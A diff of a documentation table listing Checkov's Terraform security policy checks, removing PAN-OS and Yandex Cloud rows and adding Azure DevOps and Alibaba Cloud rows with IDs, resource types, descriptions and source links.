-| 2055 | CKV_PAN_12      | resource | panos_ipsec_crypto_profile                              | Ensure IPsec profiles do not specify use of insecure authentication algorithms                                                                                                                           | Terraform | [NetworkIPsecAuthAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAuthAlgorithms.py)                                                                 |
-| 2056 | CKV_PAN_12      | resource | panos_panorama_ipsec_crypto_profile                     | Ensure IPsec profiles do not specify use of insecure authentication algorithms                                                                                                                           | Terraform | [NetworkIPsecAuthAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAuthAlgorithms.py)                                                                 |
-| 2057 | CKV_PAN_13      | resource | panos_ipsec_crypto_profile                              | Ensure IPsec profiles do not specify use of insecure protocols                                                                                                                                           | Terraform | [NetworkIPsecProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecProtocols.py)                                                                           |
-| 2058 | CKV_PAN_13      | resource | panos_panorama_ipsec_crypto_profile                     | Ensure IPsec profiles do not specify use of insecure protocols                                                                                                                                           | Terraform | [NetworkIPsecProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecProtocols.py)                                                                           |
-| 2059 | CKV_PAN_14      | resource | panos_panorama_zone                                     | Ensure a Zone Protection Profile is defined within Security Zones                                                                                                                                        | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py)                                                                           |
-| 2060 | CKV_PAN_14      | resource | panos_zone                                              | Ensure a Zone Protection Profile is defined within Security Zones                                                                                                                                        | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py)                                                                           |
-| 2061 | CKV_PAN_14      | resource | panos_zone_entry                                        | Ensure a Zone Protection Profile is defined within Security Zones                                                                                                                                        | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py)                                                                           |
-| 2062 | CKV_PAN_15      | resource | panos_panorama_zone                                     | Ensure an Include ACL is defined for a Zone when User-ID is enabled                                                                                                                                      | Terraform | [ZoneUserIDIncludeACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneUserIDIncludeACL.py)                                                                             |
-| 2063 | CKV_PAN_15      | resource | panos_zone                                              | Ensure an Include ACL is defined for a Zone when User-ID is enabled                                                                                                                                      | Terraform | [ZoneUserIDIncludeACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneUserIDIncludeACL.py)                                                                             |
-| 2064 | CKV_TF_1        | module   | module                                                  | Ensure Terraform module sources use a commit hash                                                                                                                                                        | Terraform | [RevisionHash.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/module/generic/RevisionHash.py)                                                                                             |
-| 2065 | CKV_YC_1        | resource | yandex_mdb_clickhouse_cluster                           | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                               |
-| 2066 | CKV_YC_1        | resource | yandex_mdb_elasticsearch_cluster                        | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                               |
-| 2067 | CKV_YC_1        | resource | yandex_mdb_greenplum_cluster                            | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                               |
-| 2068 | CKV_YC_1        | resource | yandex_mdb_kafka_cluster                                | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                               |
-| 2069 | CKV_YC_1        | resource | yandex_mdb_mongodb_cluster                              | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                               |
-| 2070 | CKV_YC_1        | resource | yandex_mdb_mysql_cluster                                | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                               |
-| 2071 | CKV_YC_1        | resource | yandex_mdb_postgresql_cluster                           | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                               |
-| 2072 | CKV_YC_1        | resource | yandex_mdb_redis_cluster                                | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                               |
-| 2073 | CKV_YC_1        | resource | yandex_mdb_sqlserver_cluster                            | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                               |
-| 2074 | CKV_YC_2        | resource | yandex_compute_instance                                 | Ensure compute instance does not have public IP.                                                                                                                                                         | Terraform | [ComputeVMPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMPublicIP.py)                                                                             |
-| 2075 | CKV_YC_3        | resource | yandex_storage_bucket                                   | Ensure storage bucket is encrypted.                                                                                                                                                                      | Terraform | [ObjectStorageBucketEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ObjectStorageBucketEncryption.py)                                                     |
-| 2076 | CKV_YC_4        | resource | yandex_compute_instance                                 | Ensure compute instance does not have serial console enabled.                                                                                                                                            | Terraform | [ComputeVMSerialConsole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMSerialConsole.py)                                                                   |
-| 2077 | CKV_YC_5        | resource | yandex_kubernetes_cluster                               | Ensure Kubernetes cluster does not have public IP address.                                                                                                                                               | Terraform | [K8SPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SPublicIP.py)                                                                                         |
-| 2078 | CKV_YC_6        | resource | yandex_kubernetes_node_group                            | Ensure Kubernetes cluster node group does not have public IP addresses.                                                                                                                                  | Terraform | [K8SNodeGroupPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupPublicIP.py)                                                                       |
-| 2079 | CKV_YC_7        | resource | yandex_kubernetes_cluster                               | Ensure Kubernetes cluster auto-upgrade is enabled.                                                                                                                                                       | Terraform | [K8SAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SAutoUpgrade.py)                                                                                   |
-| 2080 | CKV_YC_8        | resource | yandex_kubernetes_node_group                            | Ensure Kubernetes node group auto-upgrade is enabled.                                                                                                                                                    | Terraform | [K8SNodeGroupAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupAutoUpgrade.py)                                                                 |
-| 2081 | CKV_YC_9        | resource | yandex_kms_symmetric_key                                | Ensure KMS symmetric key is rotated.                                                                                                                                                                     | Terraform | [KMSSymmetricKeyRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/KMSSymmetricKeyRotation.py)                                                                 |
-| 2082 | CKV_YC_10       | resource | yandex_kubernetes_cluster                               | Ensure etcd database is encrypted with KMS key.                                                                                                                                                          | Terraform | [K8SEtcdKMSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SEtcdKMSEncryption.py)                                                                       |
-| 2083 | CKV_YC_11       | resource | yandex_compute_instance                                 | Ensure security group is assigned to network interface.                                                                                                                                                  | Terraform | [ComputeVMSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMSecurityGroup.py)                                                                   |
-| 2084 | CKV_YC_12       | resource | yandex_mdb_clickhouse_cluster                           | Ensure public IP is not assigned to database cluster.                                                                                                                                                    | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py)                                                                                         |
-| 2085 | CKV_YC_12       | resource | yandex_mdb_elasticsearch_cluster                        | Ensure public IP is not assigned to database cluster.                                                                                                                                                    | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py)                                                                                         |
-| 2086 | CKV_YC_12       | resource | yandex_mdb_greenplum_cluster                            | Ensure public IP is not assigned to database cluster.                                                                                                                                                    | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py)                                                                                         |
-| 2087 | CKV_YC_12       | resource | yandex_mdb_kafka_cluster                                | Ensure public IP is not assigned to database cluster.                                                                                                                                                    | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py)                                                                                         |
-| 2088 | CKV_YC_12       | resource | yandex_mdb_mongodb_cluster                              | Ensure public IP is not assigned to database cluster.                                                                                                                                                    | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py)                                                                                         |
-| 2089 | CKV_YC_12       | resource | yandex_mdb_mysql_cluster                                | Ensure public IP is not assigned to database cluster.                                                                                                                                                    | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py)                                                                                         |
-| 2090 | CKV_YC_12       | resource | yandex_mdb_postgresql_cluster                           | Ensure public IP is not assigned to database cluster.                                                                                                                                                    | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py)                                                                                         |
-| 2091 | CKV_YC_12       | resource | yandex_mdb_sqlserver_cluster                            | Ensure public IP is not assigned to database cluster.                                                                                                                                                    | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py)                                                                                         |
-| 2092 | CKV_YC_13       | resource | yandex_resourcemanager_cloud_iam_binding                | Ensure cloud member does not have elevated access.                                                                                                                                                       | Terraform | [IAMCloudElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMCloudElevatedMembers.py)                                                                 |
-| 2093 | CKV_YC_13       | resource | yandex_resourcemanager_cloud_iam_member                 | Ensure cloud member does not have elevated access.                                                                                                                                                       | Terraform | [IAMCloudElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMCloudElevatedMembers.py)                                                                 |
-| 2094 | CKV_YC_14       | resource | yandex_kubernetes_cluster                               | Ensure security group is assigned to Kubernetes cluster.                                                                                                                                                 | Terraform | [K8SSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SSecurityGroup.py)                                                                               |
-| 2095 | CKV_YC_15       | resource | yandex_kubernetes_node_group                            | Ensure security group is assigned to Kubernetes node group.                                                                                                                                              | Terraform | [K8SNodeGroupSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupSecurityGroup.py)                                                             |
-| 2096 | CKV_YC_16       | resource | yandex_kubernetes_cluster                               | Ensure network policy is assigned to Kubernetes cluster.                                                                                                                                                 | Terraform | [K8SNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNetworkPolicy.py)                                                                               |
-| 2097 | CKV_YC_17       | resource | yandex_storage_bucket                                   | Ensure storage bucket does not have public access permissions.                                                                                                                                           | Terraform | [ObjectStorageBucketPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ObjectStorageBucketPublicAccess.py)                                                 |
-| 2098 | CKV_YC_18       | resource | yandex_compute_instance_group                           | Ensure compute instance group does not have public IP.                                                                                                                                                   | Terraform | [ComputeInstanceGroupPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeInstanceGroupPublicIP.py)                                                       |
-| 2099 | CKV_YC_19       | resource | yandex_vpc_security_group                               | Ensure security group does not contain allow-all rules.                                                                                                                                                  | Terraform | [VPCSecurityGroupAllowAll.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/VPCSecurityGroupAllowAll.py)                                                               |
-| 2100 | CKV_YC_20       | resource | yandex_vpc_security_group_rule                          | Ensure security group rule is not allow-all.                                                                                                                                                             | Terraform | [VPCSecurityGroupRuleAllowAll.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/VPCSecurityGroupRuleAllowAll.py)                                                       |
-| 2101 | CKV_YC_21       | resource | yandex_organizationmanager_organization_iam_binding     | Ensure organization member does not have elevated access.                                                                                                                                                | Terraform | [IAMOrganizationElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMOrganizationElevatedMembers.py)                                                   |
-| 2102 | CKV_YC_21       | resource | yandex_organizationmanager_organization_iam_member      | Ensure organization member does not have elevated access.                                                                                                                                                | Terraform | [IAMOrganizationElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMOrganizationElevatedMembers.py)                                                   |
-| 2103 | CKV_YC_22       | resource | yandex_compute_instance_group                           | Ensure compute instance group has security group assigned.                                                                                                                                               | Terraform | [ComputeInstanceGroupSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeInstanceGroupSecurityGroup.py)                                             |
-| 2104 | CKV_YC_23       | resource | yandex_resourcemanager_folder_iam_binding               | Ensure folder member does not have elevated access.                                                                                                                                                      | Terraform | [IAMFolderElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMFolderElevatedMembers.py)                                                               |
-| 2105 | CKV_YC_23       | resource | yandex_resourcemanager_folder_iam_member                | Ensure folder member does not have elevated access.                                                                                                                                                      | Terraform | [IAMFolderElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMFolderElevatedMembers.py)                                                               |
-| 2106 | CKV_YC_24       | resource | yandex_organizationmanager_organization_iam_binding     | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible.                                                                                          | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py)                                                                 |
-| 2107 | CKV_YC_24       | resource | yandex_organizationmanager_organization_iam_member      | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible.                                                                                          | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py)                                                                 |
-| 2108 | CKV_YC_24       | resource | yandex_resourcemanager_cloud_iam_binding                | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible.                                                                                          | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py)                                                                 |
-| 2109 | CKV_YC_24       | resource | yandex_resourcemanager_cloud_iam_member                 | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible.                                                                                          | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py)                                                                 |
-| 2110 | CKV_YC_24       | resource | yandex_resourcemanager_folder_iam_binding               | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible.                                                                                          | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py)                                                                 |
-| 2111 | CKV_YC_24       | resource | yandex_resourcemanager_folder_iam_member                | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible.                                                                                          | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py)                                                                 |
+|      | Id              | Type     | Entity                                                  | Policy                                                                                                                                                                                                   | IaC       | Resource Link                                                                                                                                                                                                                    |
+|------|-----------------|----------|---------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|-----------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
+|    0 | CKV2_ADO_1      | resource | azuredevops_branch_policy_min_reviewers                 | Ensure at least two approving reviews for PRs                                                                                                                                                            | Terraform | [ADORepositoryHasMinTwoReviewers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azuredevops/ADORepositoryHasMinTwoReviewers.yaml)                                                 |
+|    1 | CKV2_ADO_1      | resource | azuredevops_git_repository                              | Ensure at least two approving reviews for PRs                                                                                                                                                            | Terraform | [ADORepositoryHasMinTwoReviewers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azuredevops/ADORepositoryHasMinTwoReviewers.yaml)                                                 |
+|    2 | CKV_ALI_1       | resource | alicloud_oss_bucket                                     | Alibaba Cloud OSS bucket accessible to public                                                                                                                                                            | Terraform | [OSSBucketPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketPublic.py)                                                                                            |
+|    3 | CKV_ALI_2       | resource | alicloud_security_group_rule                            | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22                                                                                                                                        | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress22.py)                                                      |
+|    4 | CKV_ALI_3       | resource | alicloud_security_group_rule                            | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389                                                                                                                                      | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress3389.py)                                                  |
+|    5 | CKV_ALI_4       | resource | alicloud_actiontrail_trail                              | Ensure Action Trail Logging for all regions                                                                                                                                                              | Terraform | [ActionTrailLogAllRegions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllRegions.py)                                                                          |
+|    6 | CKV_ALI_5       | resource | alicloud_actiontrail_trail                              | Ensure Action Trail Logging for all events                                                                                                                                                               | Terraform | [ActionTrailLogAllEvents.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllEvents.py)                                                                            |
+|    7 | CKV_ALI_6       | resource | alicloud_oss_bucket                                     | Ensure OSS bucket is encrypted with Customer Master Key                                                                                                                                                  | Terraform | [OSSBucketEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketEncryptedWithCMK.py)                                                                        |
+|    8 | CKV_ALI_7       | resource | alicloud_disk                                           | Ensure disk is encrypted                                                                                                                                                                                 | Terraform | [DiskIsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/DiskIsEncrypted.py)                                                                                            |
+|    9 | CKV_ALI_8       | resource | alicloud_disk                                           | Ensure Disk is encrypted with Customer Master Key                                                                                                                                                        | Terraform | [DiskEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/DiskEncryptedWithCMK.py)                                                                                  |
+|   10 | CKV_ALI_9       | resource | alicloud_db_instance                                    | Ensure database instance is not public                                                                                                                                                                   | Terraform | [RDSIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSIsPublic.py)                                                                                                    |
+|   11 | CKV_ALI_10      | resource | alicloud_oss_bucket                                     | Ensure OSS bucket has versioning enabled                                                                                                                                                                 | Terraform | [OSSBucketVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketVersioning.py)                                                                                    |
+|   12 | CKV_ALI_11      | resource | alicloud_oss_bucket                                     | Ensure OSS bucket has transfer Acceleration enabled                                                                                                                                                      | Terraform | [OSSBucketTransferAcceleration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketTransferAcceleration.py)                                                                |
+|   13 | CKV_ALI_12      | resource | alicloud_oss_bucket                                     | Ensure the OSS bucket has access logging enabled                                                                                                                                                         | Terraform | [OSSBucketAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketAccessLogs.py)                                                                                    |
+|   14 | CKV_ALI_13      | resource | alicloud_ram_account_password_policy                    | Ensure RAM password policy requires minimum length of 14 or greater                                                                                                                                      | Terraform | [RAMPasswordPolicyLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLength.py)                                                                            |
+|   15 | CKV_ALI_14      | resource | alicloud_ram_account_password_policy                    | Ensure RAM password policy requires at least one number                                                                                                                                                  | Terraform | [RAMPasswordPolicyNumber.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyNumber.py)                                                                            |
+|   16 | CKV_ALI_15      | resource | alicloud_ram_account_password_policy                    | Ensure RAM password policy requires at least one symbol                                                                                                                                                  | Terraform | [RAMPasswordPolicySymbol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicySymbol.py)                                                                            |
+|   17 | CKV_ALI_16      | resource | alicloud_ram_account_password_policy                    | Ensure RAM password policy expires passwords within 90 days or less                                                                                                                                      | Terraform | [RAMPasswordPolicyExpiration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyExpiration.py)                                                                    |
+|   18 | CKV_ALI_17      | resource | alicloud_ram_account_password_policy                    | Ensure RAM password policy requires at least one lowercase letter                                                                                                                                        | Terraform | [RAMPasswordPolicyLowercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLowercaseLetter.py)                                                          |
+|   19 | CKV_ALI_18      | resource | alicloud_ram_account_password_policy                    | Ensure RAM password policy prevents password reuse                                                                                                                                                       | Terraform | [RAMPasswordPolicyReuse.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyReuse.py)                                                                              |
+|   20 | CKV_ALI_19      | resource | alicloud_ram_account_password_policy                    | Ensure RAM password policy requires at least one uppercase letter                                                                                                                                        | Terraform | [RAMPasswordPolicyUppcaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyUppcaseLetter.py)                                                              |
+|   21 | CKV_ALI_20      | resource | alicloud_db_instance                                    | Ensure RDS instance uses SSL                                                                                                                                                                             | Terraform | [RDSInstanceSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceSSL.py)                                                                                              |
+|   22 | CKV_ALI_21      | resource | alicloud_api_gateway_api                                | Ensure API Gateway API Protocol HTTPS                                                                                                                                                                    | Terraform | [APIGatewayProtocolHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/APIGatewayProtocolHTTPS.py)                                                                            |
+|   23 | CKV_ALI_22      | resource | alicloud_db_instance                                    | Ensure Transparent Data Encryption is Enabled on instance                                                                                                                                                | Terraform | [RDSTransparentDataEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSTransparentDataEncryptionEnabled.py)                                                    |
+|   24 | CKV_ALI_23      | resource | alicloud_ram_account_password_policy                    | Ensure Ram Account Password Policy Max Login Attempts not > 5                                                                                                                                            | Terraform | [RAMPasswordPolicyMaxLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyMaxLogin.py)                                                                        |
+|   25 | CKV_ALI_24      | resource | alicloud_ram_security_preference                        | Ensure RAM enforces MFA                                                                                                                                                                                  | Terraform | [RAMSecurityEnforceMFA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMSecurityEnforceMFA.py)                                                                                |
+|   26 | CKV_ALI_25      | resource | alicloud_db_instance                                    | Ensure RDS Instance SQL Collector Retention Period should be greater than 180                                                                                                                            | Terraform | [RDSRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSRetention.py)                                                                                                  |
+|   27 | CKV_ALI_26      | resource | alicloud_cs_kubernetes                                  | Ensure Kubernetes installs plugin Terway or Flannel to support standard policies                                                                                                                         | Terraform | [K8sEnableNetworkPolicies.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/K8sEnableNetworkPolicies.py)                                                                          |
+|   28 | CKV_ALI_27      | resource | alicloud_kms_key                                        | Ensure KMS Key Rotation is enabled                                                                                                                                                                       | Terraform | [KMSKeyRotationIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/KMSKeyRotationIsEnabled.py)                                                                            |
+|   29 | CKV_ALI_28      | resource | alicloud_kms_key                                        | Ensure KMS Keys are enabled                                                                                                                                                                              | Terraform | [KMSKeyIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/KMSKeyIsEnabled.py)                                                                                            |
+|   30 | CKV_ALI_29      | resource | alicloud_alb_acl_entry_attachment                       | Alibaba ALB ACL does not restrict Access                                                                                                                                                                 | Terraform | [ALBACLIsUnrestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ALBACLIsUnrestricted.py)                                                                                  |
+|   31 | CKV_ALI_30      | resource | alicloud_db_instance                                    | Ensure RDS instance auto upgrades for minor versions                                                                                                                                                     | Terraform | [RDSInstanceAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceAutoUpgrade.py)                                                                              |
+|   32 | CKV_ALI_31      | resource | alicloud_cs_kubernetes_node_pool                        | Ensure K8s nodepools are set to auto repair                                                                                                                                                              | Terraform | [K8sNodePoolAutoRepair.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/K8sNodePoolAutoRepair.py)                                                                                |
+|   33 | CKV_ALI_32      | resource | alicloud_ecs_launch_template                            | Ensure launch template data disks are encrypted                                                                                                                                                          | Terraform | [LaunchTemplateDisksAreEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/LaunchTemplateDisksAreEncrypted.py)                                                            |
+|   34 | CKV_ALI_33      | resource | alicloud_slb_tls_cipher_policy                          | Alibaba Cloud Cypher Policy are secure                                                                                                                                                                   | Terraform | [TLSPoliciesAreSecure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/TLSPoliciesAreSecure.py)                                                                                  |
+|   35 | CKV_ALI_35      | resource | alicloud_db_instance                                    | Ensure RDS instance has log_duration enabled                                                                                                                                                             | Terraform | [RDSInstanceLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogsEnabled.py)                                                                              |
+|   36 | CKV_ALI_36      | resource | alicloud_db_instance                                    | Ensure RDS instance has log_disconnections enabled                                                                                                                                                       | Terraform | [RDSInstanceLogDisconnections.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogDisconnections.py)                                                                  |
+|   37 | CKV_ALI_37      | resource | alicloud_db_instance                                    | Ensure RDS instance has log_connections enabled                                                                                                                                                          | Terraform | [RDSInstanceLogConnections.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogConnections.py)                                                                        |
+|   38 | CKV_ALI_38      | resource | alicloud_log_audit                                      | Ensure log audit is enabled for RDS                                                                                                                                                                      | Terraform | [LogAuditRDSEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/LogAuditRDSEnabled.py)                                                                                      |
